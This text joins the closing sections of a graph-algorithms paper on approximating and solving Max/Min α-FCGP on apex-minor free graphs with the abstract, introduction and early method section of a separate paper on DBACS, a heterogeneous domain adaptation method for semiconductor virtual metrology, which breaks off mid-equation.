For any pair of distinct vertices \(u,v\), let \(X_{uv}=1\) if \(\{u,v\}\) is an edge and \(X_{uv}=0\) otherwise. Then, consider \[\mathbb{E}[m(U^{*},O_{i})]=\sum_{u\in U}\sum_{v\in O_{i}}X_{uv}\cdot\Pr(u\in U^{*})=\rho\sum_{u\in U}\sum_{v\in O_{i}}X_{uv}\leq\frac{\varepsilon^{2}}{4}\cdot m(O_{i},U) \tag{2}\] Now we analyze \(\mathbb{E}[Q_{1}]\). For every edge with one endpoint in \(U\) and the other in \(V\setminus(U\cup O_{i})\), there is a contribution \(\alpha\) to \(Q_{1}\) with probability \(\rho\). Moreover, for every edge with both endpoints in \(U\), the contribution to \(Q_{1}\) is \(\alpha\) with probability \(2\rho(1-\rho)\) and \(1-\alpha\) with probability \(\rho^{2}\). Thus, we obtain \[\mathbb{E}[Q_{1}]=\alpha\rho\cdot m(U,V\setminus(U\cup O_{i}))+(2\alpha\rho(1-\rho)+(1-\alpha)\rho^{2})\cdot m(U)\] \[\geq\alpha\rho\cdot m(U,V\setminus(U\cup O_{i}))+(2\alpha\rho+(1-3\alpha)\rho^{2})\cdot m(U)\] \[=\alpha\rho\cdot(m(U,V\setminus(U\cup O_{i}))+2m(U))=\alpha\rho\sum_{u\in U}d_{V\setminus O_{i}}(u). \tag{3}\] Here the inequality is due to \(\alpha\geq 1/3\). Note that for any \(u\in U\) and \(v\in O_{o}\), \(d(u)\geq d(v)\), which implies that for any \(u\in U\), \(d(u)\geq\frac{\sum_{v\in O_{o}}d(v)}{|O_{o}|}\). Therefore, \[\sum_{u\in U}d(u)\geq\frac{|U|}{|O_{o}|}\sum_{v\in O_{o}}d(v)=\frac{1}{\rho}\cdot\sum_{v\in O_{o}}d(v) \tag{4}\] Now we consider two cases. **Case 1:**\(\sum_{u\in U}d(u)\leq\frac{4}{\varepsilon}\cdot m(O_{i},U)\). Then, \[\frac{4}{\varepsilon}\cdot m(O_{i},U)\geq\sum_{u\in U}d(u)\geq\frac{1}{\rho}\cdot\sum_{v\in O_{o}}d(v)\qquad\text{(Using (4))}\] \[\implies\frac{4}{\varepsilon}\cdot m(O_{i},U)\geq\frac{8}{\varepsilon^{2}}\cdot\sum_{v\in O_{o}}d(v)\qquad\text{(Since }\rho\leq\varepsilon^{2}/4\text{)}\] \[\implies\varepsilon/2\cdot\alpha\cdot m(O_{i},U)\geq\alpha\sum_{v\in O_{o}}d(v)\geq\mathbb{E}[A] \tag{5}\] Where we use (1) in the last inequality. Then consider, \[\mathbb{E}[B-A]\geq-\alpha\cdot\mathbb{E}[m(U^{*},O_{i})]-\mathbb{E}[A]\] \[\geq-\frac{\varepsilon^{2}}{8}\alpha\cdot m(O_{i},U)-\frac{\varepsilon}{2}\cdot\alpha\cdot m(O_{i},U)\geq-\varepsilon\alpha\cdot m(O_{i},U)\qquad\text{(Using (2) and (5))}\] \[\geq-\varepsilon\cdot\mathsf{cov}_{\alpha}(O) \tag{6}\] This finishes the first case. **Case 2:**\(\sum_{u\in U}d(u)>\frac{4}{\varepsilon}\cdot m(O_{i},U)\). This implies that, \[\frac{\varepsilon}{4}\cdot\sum_{u\in U}d(u)>\sum_{u\in U}d_{O_{i}}(u)\] \[\implies\sum_{u\in U}d_{V\setminus O_{i}}(u)\geq\left(1-\frac{\varepsilon}{4}\right)\cdot\sum_{u\in U}d(u) \tag{7}\] Then, plugging back in (3), we obtain, \[\mathbb{E}[Q_{1}]\geq\alpha\rho(1-\rho/2)\cdot(1-\varepsilon/4)\cdot\sum_{u\in U}d(u)\] \[\geq\alpha\rho(1-\varepsilon/2)\cdot\sum_{u\in U}d(u)\] \[\geq\alpha\rho(1-\varepsilon/2)\cdot\frac{|U|}{|O_{o}|}\sum_{v\in O_{o}}d(v)\qquad\text{(Using (4))}\] \[\geq\alpha(1-\varepsilon/2)\cdot\sum_{v\in O_{o}}d(v)\] \[\geq A\cdot(1-\varepsilon/2) \tag{8}\] Where we use (1) in the last inequality. Then, by (2) and (8), we obtain that, \[\mathbb{E}[B-A]=\mathbb{E}[B]-\mathbb{E}[A]\geq-\varepsilon/2\cdot\mathbb{E}[A]-\alpha\varepsilon\cdot m(O_{i},V\setminus O) \tag{9}\] Now we argue that \(\alpha\cdot m(O_{i},V\setminus O)+\mathbb{E}[A]=\alpha\cdot m(O_{i},V\setminus O)+A\leq\mathsf{cov}_{\alpha}(O)\). All edges with one endpoint in \(O_{i}\) and the other outside \(O\) contribute \(\alpha\) to the objective, which corresponds to the first term. Note that \(A\) is exactly the contribution of edges with at least one endpoint in \(O_{o}\) to the objective. 
Further, note that no such edge has one endpoint in \(O_{i}\) and the other outside \(O\), and thus it is not counted in the first term. Thus, the sum of the two terms is upper bounded by the objective, \(\mathsf{cov}_{\alpha}(O)\). Plugging this back in (9), we obtain that \(\mathbb{E}[B-A]\geq-\varepsilon\cdot\mathsf{cov}_{\alpha}(O)\) in the second case as well. This completes the proof of the lemma and the theorem. Example showing a gap for \(\alpha<1/3\). We now describe examples showing that for each fixed \(\alpha<1/3\), the above strategy of focusing on a bounded number of vertices of the largest degree does not lead to a \((1-\varepsilon)\)-approximation, for large enough \(k\). Let \(f(k,\varepsilon)\) be an arbitrary function. Consider any \(\alpha=1/3-\mu\), where \(0<\mu\leq 1/3\), and let \(N\geq f(k,\varepsilon)\) be a large positive integer. The graph \(G=(V,E)\) showing a gap is defined as follows. \(V=H\uplus L\uplus O\), where \(|H|=N,|L|=kN\) and \(|O|=k\), thus \(|V|=N(k+1)+k\). For each vertex \(v\in H\), we attach \(k\) distinct vertices from \(L\) as pendants. Finally, we add all \(\binom{k}{2}\) edges among the vertices of \(O\), making it into a complete graph. Each vertex of \(H\) has degree exactly \(k\), each vertex of \(O\) has degree exactly \(k-1\), and each vertex of \(L\) has degree exactly \(1\); this gives the sorted order. It follows that the first \(f(k,\varepsilon)\) vertices in the sorted order, say \(T\), all belong to \(H\). Furthermore, for any subset \(S\subset T\) of size \(k\), \(\mathsf{cov}_{\alpha}(S)=\alpha\cdot k^{2}=(\frac{1}{3}-\mu)\cdot k^{2}\). On the other hand, \(\mathsf{cov}_{\alpha}(O)=(1-\alpha)\cdot\binom{k}{2}=(\frac{2}{3}+\mu)\cdot\frac{k^{2}-k}{2}\approx(\frac{1}{3}+\frac{\mu}{2})\cdot k^{2}\), assuming \(k\) is large enough. Thus, for any \(k\)-sized subset \(S\subseteq T\), \(\frac{\mathsf{cov}_{\alpha}(S)}{\mathsf{cov}_{\alpha}(O)}<\frac{1/3-\mu}{1/3+\mu/2}\leq 1-3\mu\). Thus, \(T\) does not contain a \((1-\varepsilon)\)-approximate solution for any \(\varepsilon<3\mu\). This shows that our analysis of Theorem 2 is tight for the range \(\alpha\geq 1/3\). ## 3 Subexponential FPT Algorithm for Max \(\alpha\)-FCGP on Apex-Minor Free Graphs Fomin et al. [14] showed that Partial Vertex Cover on apex-minor free graphs can be solved in time \(2^{\mathcal{O}(\sqrt{k})}\cdot n^{\mathcal{O}(1)}\). In this section, we will prove its generalization to Max \(\alpha\)-FCGP as well as Min \(\alpha\)-FCGP: **Theorem 3**.: _For an apex graph \(H\), let \(\mathcal{H}\) be a family of \(H\)-minor free graphs._ * _For any_ \(\alpha\geq 1/3\)_,_ Max \(\alpha\)_-FCGP _for_ \(\mathcal{H}\) _can be solved in_ \(2^{\mathcal{O}(\sqrt{k})}\cdot n^{\mathcal{O}(1)}\) _time._ * _For any_ \(\alpha\leq 1/3\)_,_ Min \(\alpha\)_-FCGP _for_ \(\mathcal{H}\) _can be solved in_ \(2^{\mathcal{O}(\sqrt{k})}\cdot n^{\mathcal{O}(1)}\) _time._ We will give a proof for the maximization variant. The minimization variant follows analogously. Let \(\sigma=v_{1},v_{2},\ldots,v_{n}\) be an ordering of the vertices of \(V\) in non-increasing order of degrees, with ties broken arbitrarily. That is, \(d(v_{1})\geq d(v_{2})\geq\ldots\geq d(v_{n-1})\geq d(v_{n})\). We will denote the graph by \(G=(V_{\sigma},E)\) to emphasize the fact that the vertex set is ordered w.r.t. \(\sigma\). We also let \(V_{\sigma}^{j}=\{v_{1},\ldots,v_{j}\}\). We first prove the following lemma. **Lemma 3**.: _Let \(G=(V_{\sigma},E)\) be a yes-instance for Max \(\alpha\)-FCGP, where \(1/3\leq\alpha\leq 1\). 
Let \(C=\{u_{i_{1}},u_{i_{2}},\ldots,u_{i_{k}}\}\) be the lexicographically smallest solution for Max \(\alpha\)-FCGP and \(u_{i_{k}}=v_{j}\) for some \(j\). Then \(C\) is a dominating set of size \(k\) for \(G[V_{\sigma}^{j}]\)._ Proof.: Suppose for contradiction that \(C\) is not a dominating set for \(G[V_{\sigma}^{j}]\). Then, there exists a vertex \(v_{i}\) with \(1\leq i<j\) such that \(N[v_{i}]\cap C=\emptyset\). Set \(C^{\prime}=(C\setminus\{v_{j}\})\cup\{v_{i}\}\). Note that \(d(v_{i})\geq d(v_{j})\). Define the following: \[m_{1}=m(\{v_{j}\},V\setminus C),\] \[m_{2}=m(\{v_{j}\},C\setminus\{v_{j}\}),\] \[m_{3}=m(\{v_{i}\},(V\setminus C)\cup\{v_{j}\})=d(v_{i}),\] \[m_{4}=m(\{v_{i}\},C\setminus\{v_{j}\})=0.\] We will show that \(C^{\prime}\) is another solution for the Max \(\alpha\)-FCGP instance. Since \(C^{\prime}\setminus\{v_{i}\}=C\setminus\{v_{j}\}\), it suffices to show that \[\mathsf{cov}_{\alpha}(C^{\prime})-\mathsf{cov}_{\alpha}(C)=(\mathsf{cov}_{\alpha}(C^{\prime})-\mathsf{cov}_{\alpha}(C^{\prime}\setminus\{v_{i}\}))-(\mathsf{cov}_{\alpha}(C)-\mathsf{cov}_{\alpha}(C\setminus\{v_{j}\}))\] is nonnegative. By definition, \[\mathsf{cov}_{\alpha}(C^{\prime})-\mathsf{cov}_{\alpha}(C^{\prime}\setminus\{v_{i}\})=\alpha\cdot m_{3}+((1-\alpha)-\alpha)\cdot m_{4}=\alpha\cdot d(v_{i})\text{ and }\] \[\mathsf{cov}_{\alpha}(C)-\mathsf{cov}_{\alpha}(C\setminus\{v_{j}\})=\alpha\cdot m_{1}+((1-\alpha)-\alpha)\cdot m_{2}\leq\alpha\cdot(m_{1}+m_{2})=\alpha\cdot d(v_{j}), \tag{10}\] where the inequality is due to the assumption that \(\alpha\geq 1/3\). Therefore, \[\mathsf{cov}_{\alpha}(C^{\prime})-\mathsf{cov}_{\alpha}(C)=\alpha\cdot(d(v_{i})-d(v_{j}))\geq 0,\] so \(C^{\prime}\) is also a solution, and it precedes \(C\) lexicographically, which is a contradiction to the assumption that \(C\) is the lexicographically smallest solution for Max \(\alpha\)-FCGP. In view of Lemma 3, we can use the following approach to search for the lexicographically smallest solution \(C\). First, we guess the last vertex \(v_{j}\) of \(C\) in the ordering \(\sigma\), i.e., we search for a solution \(C\) such that \(v_{j}\in C\) and \(C\subseteq V_{\sigma}^{j}\). If \(G[V_{\sigma}^{j}]\) has no dominating set of size at most, say, \(2k\), then we reject. This can be done in polynomial time, since Dominating Set admits a PTAS on apex-minor free graphs [8]. We thus may assume that there is a dominating set of size \(2k\) in \(G[V_{\sigma}^{j}]\). It is known that an apex-minor free graph with a dominating set of size \(\kappa\) has treewidth \(\mathcal{O}(\sqrt{\kappa})\), where \(\mathcal{O}\) hides a factor depending on the apex graph whose minors are excluded [6, 7, 12]. We can use a constant-factor approximation algorithm of Demaine [9] to find a tree decomposition \(\mathcal{T}\) of width \(w\in\mathcal{O}(\sqrt{k})\). Finally, we solve the problem via dynamic programming over the tree decomposition. Bonnet et al. [2] gave an \(\mathcal{O}^{*}(2^{w})\)-time algorithm that solves Max \(\alpha\)-FCGP with a tree decomposition of width \(w\) given. We need to solve a slightly more general problem because the tree decomposition \(\mathcal{T}\) is over \(V_{\sigma}^{j}\). To remove \(V\setminus V_{\sigma}^{j}\), we introduce a weight \(\omega\colon V_{\sigma}^{j}\to\mathbb{N}\) defined by \(\omega(v)=|N(v)\cap(V\setminus V_{\sigma}^{j})|\). The objective is then to maximize \(\mathsf{cov}_{\alpha}(C)+\alpha\sum_{v\in C}\omega(v)\). The dynamic programming algorithm of Bonnet et al. can be adapted to solve this weighted variant in the same running time. 
Thus, we obtain a \(2^{\mathcal{O}(\sqrt{k})}\cdot n^{\mathcal{O}(1)}\)-time algorithm for Max \(\alpha\)-FCGP. For Min \(\alpha\)-FCGP, we can show the following lemma, whose proof is omitted because it is almost analogous to the previous one. The only change is that \(V_{\sigma}\) refers to the vertices in non-decreasing order of degrees. Also, we consider the regime where \(0\leq\alpha\leq 1/3\), which implies \(\alpha\leq 1-2\alpha\), giving the reverse inequality in (10). **Lemma 4**.: _Let \(G=(V_{\sigma},E)\) be a yes-instance for Min \(\alpha\)-FCGP, where \(0\leq\alpha\leq 1/3\). Let \(C=\{u_{i_{1}},u_{i_{2}},\ldots,u_{i_{k}}\}\) be the lexicographically smallest solution for Min \(\alpha\)-FCGP and \(u_{i_{k}}=v_{j}\) for some \(j\). Then \(C\) is a dominating set of size \(k\) for \(G[V_{\sigma}^{j}]\)._ With this lemma at hand, an analogous algorithm solves Min \(\alpha\)-FCGP in \(2^{\mathcal{O}(\sqrt{k})}\cdot n^{\mathcal{O}(1)}\) time, thereby proving Theorem 3. ## 4 Conclusion In this paper, we demonstrated that the algorithms exploiting the "degree-sequence" that have been successful for designing algorithms for Max \(k\)-Vertex Cover naturally generalize to Max/Min \(\alpha\)-FCGP. Specifically, we designed FPT approximations for Max/Min \(\alpha\)-FCGP parameterized by \(k,\alpha,\) and \(\varepsilon,\) for any \(\alpha\in(0,1]\). For Max \(\alpha\)-FCGP, this result is tight since, when \(\alpha=0\), the problem is equivalent to Densest \(k\)-Subgraph, which is hard to approximate in FPT time [21]. We also designed subexponential FPT algorithms for Max \(\alpha\)-FCGP (resp. Min \(\alpha\)-FCGP) for the range \(\alpha\geq 1/3\) (resp. \(\alpha\leq 1/3\)) on any apex-minor closed family of graphs. It is a natural open question whether one can obtain subexponential FPT algorithms for Max/Min \(\alpha\)-FCGP for the entire range \(\alpha\in[0,1]\). A notable special case is that of Densest \(k\)-Subgraph on planar graphs. In this case, the problem is not even known to be NP-hard, if the subgraph is allowed to be disconnected. For the Densest Connected \(k\)-Subgraph problem, it was shown by Keil and Brecht [18] that the problem is NP-complete on planar graphs. On the other hand, it can be shown that Densest Connected \(k\)-Subgraph admits a subexponential-in-\(k\) randomized algorithm on apex-minor free graphs using the general results of Fomin et al. [13]. Thus, dealing with disconnected dense subgraphs is difficult for both algorithms and lower bounds.
2301.01038
Heterogeneous Domain Adaptation and Equipment Matching: DANN-based Alignment with Cyclic Supervision (DBACS)
Process monitoring and control are essential in modern industries for ensuring high quality standards and optimizing production performance. These technologies have a long history of application in production and have had numerous positive impacts, but also hold great potential when integrated with Industry 4.0 and advanced machine learning, particularly deep learning, solutions. However, in order to implement these solutions in production and enable widespread adoption, the scalability and transferability of deep learning methods have become a focus of research. While transfer learning has proven successful in many cases, particularly with computer vision and homogenous data inputs, it can be challenging to apply to heterogeneous data. Motivated by the need to transfer and standardize established processes to different, non-identical environments and by the challenge of adapting to heterogeneous data representations, this work introduces the Domain Adaptation Neural Network with Cyclic Supervision (DBACS) approach. DBACS addresses the issue of model generalization through domain adaptation, specifically for heterogeneous data, and enables the transfer and scalability of deep learning-based statistical control methods in a general manner. Additionally, the cyclic interactions between the different parts of the model enable DBACS to not only adapt to the domains, but also match them. To the best of our knowledge, DBACS is the first deep learning approach to combine adaptation and matching for heterogeneous data settings. For comparison, this work also includes subspace alignment and a multi-view learning method that deals with heterogeneous representations by mapping data into correlated latent feature spaces. Finally, DBACS, with its ability to adapt and match, is applied to a virtual metrology use case for an etching process run on different machine types in semiconductor manufacturing.
Natalie Gentner, Gian Antonio Susto
2023-01-03T10:56:25Z
http://arxiv.org/abs/2301.01038v1
Heterogeneous Domain Adaptation and Equipment Matching: DANN-based Alignment with Cyclic Supervision (DBACS) ###### Abstract Process monitoring and control are essential in modern industries for ensuring high quality standards and optimizing production performance. These technologies have a long history of application in production and have had numerous positive impacts, but also hold great potential when integrated with Industry 4.0 and advanced machine learning, particularly deep learning, solutions. However, in order to implement these solutions in production and enable widespread adoption, the scalability and transferability of deep learning methods have become a focus of research. While transfer learning has proven successful in many cases, particularly with computer vision and homogenous data inputs, it can be challenging to apply to heterogeneous data. Motivated by the need to transfer and standardize established processes to different, non-identical environments and by the challenge of adapting to heterogeneous data representations, this work introduces the Domain Adaptation Neural Network with Cyclic Supervision (DBACS) approach. DBACS addresses the issue of model generalization through domain adaptation, specifically for heterogeneous data, and enables the transfer and scalability of deep learning-based statistical control methods in a general manner. Additionally, the cyclic interactions between the different parts of the model enable DBACS to not only adapt to the domains, but also match them. To the best of our knowledge, DBACS is the first deep learning approach to combine adaptation and matching for heterogeneous data settings. For comparison, this work also describes and analyzes subspace alignment and a multi-view learning method that deals with heterogeneous representations, called views, by mapping data into correlated latent feature spaces. Finally, the DBACS method, with its ability to adapt and match, is applied to a virtual metrology use case for an etching process run on different machine types in semiconductor manufacturing. deep learning equipment matching heterogeneous domain adaptation multi-view learning semiconductor manufacturing virtual metrology ## 1 Introduction Process control and monitoring are essential elements in any automated production setting. Both have a long history of use, particularly in specialized and demanding manufacturing environments. In recent years, the complexity of these systems has made them the focus of ongoing research, particularly in the context of Industry 4.0 and due to the increasing usage of sophisticated artificial intelligence-based solutions. While various machine learning and deep learning techniques have been applied successfully to a wide range of data types, the current focus is on scalability and the generalization of models, particularly for non-standardized environments. Despite the potential of machine learning-based technologies to improve automation in production, there are several issues that continue to limit their widespread success. These include limited data availability, small data sets, lack of standardization, low or inconsistent data quality, and complex, fragmented data. These challenges can make it difficult to transfer and generalize models, hindering progress towards higher levels of fab automation and overall digitalization. As a result, the focus is now on standardization and scalability, particularly for application-driven research. 
This is important due to the financial and technological investments required for method and model development, as well as the need for 24/7 support for critical production infrastructure and maintenance in highly automated environments. In non-standardized environments, there are two main approaches to supporting the scalability of methods and model transfer, as discussed in the semiconductor literature: (i) matching and (ii) transfer learning, with a focus on domain adaptation. The goal of matching is to harmonize environments and processes by using data and expert knowledge, with the aim of eliminating differences. Transfer learning, on the other hand, uses a purely data-driven approach to change the data representation (but not the data itself or any equipment or process properties) in order to bring corresponding data sets closer together, or in the best case, make them indistinguishable. However, most machine learning-based transfer learning methods, which are driven by computer vision and naturally homogeneous data input, are not designed to handle heterogeneous data. While this is not a common issue when modeling tasks use images as the main input, it becomes a significant challenge in semiconductor scenarios where an established process must be transferred to a different, non-identical equipment due to availability or utilization. This raises the question of how to match non-identical equipment and use knowledge gained from one tool to optimize the same process on a different, non-identical tool in order to improve output quality. To address the research gap related to heterogeneous domain adaptation (DA), this paper introduces an extended version of DBAM called DANN-based Alignment with Cyclic Supervision (DBACS). This method, which was previously applied to a homogeneous VM modeling task in previous studies Gentner et al. (2020, 2021), has the ability to map unpaired samples in their original feature spaces, enabling the functionality of matching. This capability allows DBACS to naturally enrich the existing method. This contribution methodically extends the work presented in Gentner et al. (2021) by demonstrating an extension suitable for heterogeneous domain adaptation (DA) and matching. The main contributions of the proposed DBACS method are as follows: * DBACS is able to handle high data complexity caused by heterogeneous systems in production and is applicable to various data types, such as time series data; * DBACS is able to tackle both supervised and unsupervised adaptation for heterogeneous input data using the original input feature spaces; * DBACS enables model scaling by allowing the use of a well-trained model for another data set with no assumption of the same feature representation, but only identical underlying physical information; * DBACS ensures interpretability and comparability of all parts of the model and allows unpaired feature matching on top of the adaptation in both directions. To evaluate the performance of DBACS in the context of heterogeneous data, the method is compared to selected benchmark models, including subspace alignment (SA) using principle component analysis (PCA) with and without correlation alignment (CORAL) and canonical correlation analysis (CCA), a method well known in the field of multi-view learning. Virtual metrology (VM), a representative of standard process control mechanisms, is chosen as a real-world application showcase for this study. 
VM, also known as a soft sensor, is a statistical model that predicts inline wafer properties based on process information and sensor measurements. Since its introduction to the semiconductor industry in 2005 Chen et al. (2005), VM has a long research history and has benefitted greatly from the adoption of new modeling techniques driven by Industry 4.0 and the use of artificial intelligence. In addition to being useful for predictive maintenance, fault detection and classification, and defect classification, VM is a key mechanism for direct/early fault detection and enabling quality improvements by increasing monitoring capacity, control through real-time process corrections in combination with a Run-to-Run system, and smart capacity usage by preparing input for smart sampling strategies and improved decision making. The rest of the paper is organized into six more sections: Section 2 introduces related literature, Section 3 formalizes the problem and presents the main model DBACS and selected benchmarks. Section 4 gives details on virtual metrology, the etching process, data, preprocessing and the experimental design, while in Section 5 implementation details, including hyperparameters and architectures, as well as results are reported. In Section 6, the suitability of DBACS for matching is discussed. Section 7 closes with concluding remarks and envisioned future research directions. ## 2 Literature and Background In this section we summarize literature related to both relevant methodological approaches and application works. One of the main issues in adopting ML-based solutions in complex production is the need for scalability. With a large number of machines, products, and recipes (e.g., in semiconductor production), it is often infeasible to build ad-hoc analytics solutions for each scenario. In this context, scalability in learning frameworks is of fundamental importance. One approach to achieve it is _matching_, which has a long history in non-standardized manufacturing environments and can be implemented using both classical methods Chouichi et al. (2020) and DL techniques Heng et al. (2021). With the rise of Domain Adversarial Networks (DANNs) Ganin et al. (2016) and the related concept of _domain adaptation_, a theory developed to deal with the occurrence of different data distributions for one modeling task, there has been a surge in the number of publications focusing on transfer learning for semiconductor applications Kang (2017); Tsutsui and Matsuzawa (2019) and Chien et al. (2022). Domain adaptation also enables semi-supervised learning, as demonstrated in Farahani et al. (2020) and Li et al. (2020). Unsupervised domain adaptation for semiconductor applications has also been explored using DANNs Shim and Kang (2022). A variety of metrics and losses can be used to measure distribution distances in domain adaptation settings, such as maximum mean discrepancy (MMD) Azamfar et al. (2020). For a broader overview of domain adaptation, see Wang and Deng (2018) for a computer vision survey and Courty et al. (2017) for an example using optimal transport. Generative models have also been widely used in production-related research. For example, Lu et al. (2019) presents a generative adversarial network (GAN)-inspired approach using pseudo labeling to address class imbalance in defect inspection in industrial settings. 
While the literature on homogeneous domain adaptation for semiconductor applications is growing, there is still a lack of research on heterogeneous domain adaptation for specific semiconductor use cases. However, literature from other industry sectors shows promising results for heterogeneous domain adaptation tasks, such as classification of heterogeneous information networks Yang et al. (2020), image-to-text transfer Fang et al. (2022); Tsai et al. (2016) and the combination of distribution alignment via subspace mapping with pseudo-labeling Alipour and Tahmoresnezhad (2022). Another approach for handling heterogeneous data distributions is multi-view learning (MVL) Perry et al. (2021). A systematic overview of MVL can be found in Sun (2013) and in Xu et al. (2013). There are few examples of MVL applied to fault detection and performance systems in manufacturing environments, such as Chen et al. (2016) and Yu et al. (2021), which use correlation and Canonical Correlation Analysis (CCA) Hardoon et al. (2004) for fault detection and performance evaluation. A review of MVL in the deep learning (DL) context is provided by Yan et al. (2021), while a range of CCA approaches is discussed in Chapman and Wang (2021). Metrology and its relationship to process control have been discussed in the literature, such as in early works such as Chen et al. (2005) and Su et al. (2007). While metrology is essential for quality and control, it can be costly in terms of productivity, which has led to the development of numerous virtual metrology (VM) approaches in the literature. VM is still an active research topic, with state-of-the-art methods like isolation forest being used in a decision-based model framework (e.g., Chien et al. (2022)). VM tools are often developed based on data from fault detection and classification (FDC) systems, which are monitoring software used to overview different types of equipment in semiconductor manufacturing. FDC data typically consists of descriptive statistics computed from raw, time-dependent physical sensor measurements installed on the equipment, making the VM problem a classic tabular data regression task. Given the high dimensionality of FDC data, feature selection is an important step in the context of tabular data VM and has been widely discussed in the literature ; see Saeys et al. (2007) for a general review of selection techniques and Kang et al. (2016) or Lynn et al. (2009) and Fan et al. (2020) for more sophisticated VM specific preprocessing and selection techniques. Other notable regression methods for VM prediction include those presented in Lynn et al. (2009); Susto and Beghi (2012) and Park and Kim (2016). Chen et al. (2020) compares tree-based methods for VM modeling to other regression methods and neural networks. Another set of approaches in the VM literature aims to solve the regression task using time series data collected from equipment sensor data. These approaches include those presented in Park and Kim (2016) and add Susto et al. (2015), which introduced the Supervised Aggregative Feature Extraction framework for feature selection. DL-based approaches have also been successfully employed for modeling with time series input data, such as in Lee and Kim (2020); Maggipinto et al. (2018, 2019) and Lee and Kim (2020). ## 3 Proposed Approaches In this section, a general description and mathematical formalization of a modeling task with heterogeneous input are given, including the necessary assumptions. 
We also provide a formal description of the methods and algorithms used to solve the task under exam. The modeling task at hand is formulated as regression, with the goal of scaling a selected model to make it usable for two data sets with different distributions and heterogeneous data representations. Since the input spaces do not have a common subspace sufficient for the task, the modeling must be done in a domain-specific manner. To address scalability, the goal is to use a trained statistical model for both data sets in parallel while minimizing the prediction error and maximizing the accuracy of a dedicated model. To achieve this, we compare methods from the field of domain adaptation and multi-view learning. First, we mathematically formalize the regression task followed by selected methods. Let \(f_{S}\) define a modeling task, let a hypothesis class \(\mathcal{H}\) be a set of all possible modeling functions \(h\in\mathcal{H}\) that are considered for a specific task. Let \(X_{S}\subset\mathbb{R}^{ns}\) be defined as the first input space and \(Y\) as the output space. The output space \(Y\) is defined as \(Y\subset\mathbb{R}\) in case of a regression task. A distribution over \(X_{S}\times Y\) is called source domain. For time series data, let \(X_{S}\subset\mathcal{T}\times\mathbb{R}^{ns}\) where \(\mathcal{T}\) describes the set of considered points in time and \(x_{S}^{n}\in\mathbb{R}^{ns}\) a sample from the source feature space taken at a fixed point in time \(t\in\mathcal{T}\). A learning algorithm is provided with a source data set \(S\) drawn i.i.d. from the source domain \(D_{S}\) with \(X_{S}\times Y_{S}\), \(X_{S}\subset X\), \(Y_{S}\subset Y\). In the SSL setting, it is distinguished between labeled and unlabeled data and define \(S:=SL\cup SU\) where \(SU\) stands for the unlabeled source sample subset and \(SL\) for the labeled one. Without loss of generality for UDA and SSL, \(SU=\emptyset\) sine the source domain is assumed to be labeled. Hence \[S=\{X_{S},Y_{S}\}=\{X_{SL},Y_{SL}\}=\{x_{S}^{i},y_{S}^{i}\}_{i=1}^{ns}\sim\{D_ {S}\}^{n_{s}}, \tag{1}\] with \(n_{S}\) being the number of drawn samples (all labeled) and therefore \(X_{S}=X_{SL}\subset\mathbb{R}^{ns}\), \(Y_{S}=Y_{SL}\subset Y\). A learning algorithm is provided with a second set \(T\) drawn i.i.d. from the target domain \(D_{T}\) with different data distribution, representation and feature space. Hence, let \(T=TL\cup TU\) be the second called target data set \(T\) drawn i.i.d. from a target domain \(D_{T}\) with a distribution over \(X_{T}\times Y_{T}\), \(X_{T}\subset\mathbb{R}^{n_{T}}\), \(Y_{T}\subset Y\), and consisting of unlabeled \(TU\) and/or labeled \(TL\) samples. \[TL=\{X_{TL},Y_{TL}\}=\{x_{T}^{j},y_{T}^{j}\}_{j=1}^{n_{T}-l}\sim\{D_{T}\}^{n_{ t}-l}; \tag{2}\] \[TU=\{X_{TU}\}=\{x_{T}^{j}\}_{j=n_{T}-l+1}^{n_{T}}\sim\{D_{T}^{X}\}^{n_{t}}; \tag{3}\] with \(n_{T}\) being the number of drawn target samples, therefore \(X_{TL}\subset X_{T}\subset\mathbb{R}^{n_{T}}\), \(Y_{TL}\subset Y_{T}\subset Y\) and \(X_{TU}\subset X_{T}\subset\mathbb{R}^{n_{T}}\). For time series data, let \(X_{T}\subset\mathcal{T}\times\mathbb{R}^{n_{T}}\) where \(\mathcal{T}\) describes the set of considered points in time and \(x_{T}^{t}\in\mathbb{R}^{n_{T}}\) a sample from the target feature space taken at a fixed point in time \(t\in\mathcal{T}\). ### DANN-based Alignment with Cyclic Supervision (DBACS) In this work, we present a new framework, called DANN-based Alignment with Cyclic Supervision (DBACS). 
The DBACS approach (illustrated in Figure 1) is an extented version of DBAM Gentner et al. (2021) and is designed for binary heterogeneous domain adaptation using source and target domain. DBACS consists of five main parts: * the baseline or reference _prediction_ model \(P\); * an encoder/alignment model called _aligner_\(F\) used to map the target domain to the source domain (the output of the aligner is called aligned); * \(F\) is connected to a second encoder/alignment model _aligner_\(G\) that maps the source domain to the target domain. By combining both aligners, it is possible to introduce _cycle-consistency_ by comparing source samples with its cycled sample and target samples with its cycled samples; * a domain _discriminator_\(A\) for classification of source domain versus aligned target domain; * Adversarial training in both directions is enabled by adding a second domain discriminator (called _discriminator_\(B\)) for target versus aligned source comparison. The various components of the DBACS architecture are discussed in the following. Prediction lossLet \(h_{P}:X_{S}\to Y\) be a dedicated statistical model trained on a data set \(S\), let \(S\) be a labeled source sample set drawn i.i.d. from a domain \(D_{S}\) with \(n_{S}=|S|\) being the number of drawn samples. The neural network representation is parameterized by \(\theta_{P}\) and \(P(x_{S},\theta_{P})\) where \(P\) is the model function with parameters \(\theta_{P}\) that outputs the prediction for \(x_{S}\in X_{S}\). The loss \(L_{P}\) used for training and minimization is defined as: \[\min_{h_{P}\in\mathcal{H}}L_{P}(X_{S})=\min_{h_{P}\in\mathcal{H}}L_{D_{S}}(h_{ P}(X_{S}))=\min_{\theta_{P}}L_{D_{S}}(X_{S},\theta_{P})=\min_{\theta_{P}} \mathbf{L}_{(x,y)\in S}\left(P\left(x,\theta_{P}\right),y\right). \tag{4}\] where \(\mathbf{L}\) is selected based on the modeling task at hand; for VM regression task we choose mean absolute error (MAE). Cycle consistency lossLet \(h_{F}:X_{T}\to X_{S}\) be a statistical model function aligning target to source and \(F(x_{T},\theta_{F})\) be its parameterized representation where \(F\) is the model function with parameters \(\theta_{F}\) that outputs the prediction for \(x_{T}\in X_{T}\). Let \(h_{G}:X_{S}\to X_{T}\) be a statistical model function aligning source to target and \(G(x_{S},\theta_{G})\) be its parameterized representation where \(G\) is the model function with parameters \(\theta_{G}\) that outputs the prediction for \(x_{S}\in X_{S}\). Let \(x_{S}\sim D_{S}\) the data distribution according to \(D_{S}\) and \(x_{T}\sim D_{T}\) according to \(D_{T}\). Then, the cycle-consistency loss is defined as: \[L_{cycle_{S}}(X_{S}):=L_{G,F,D_{S}}(X_{S})=\mathbf{L}_{x_{S}\sim 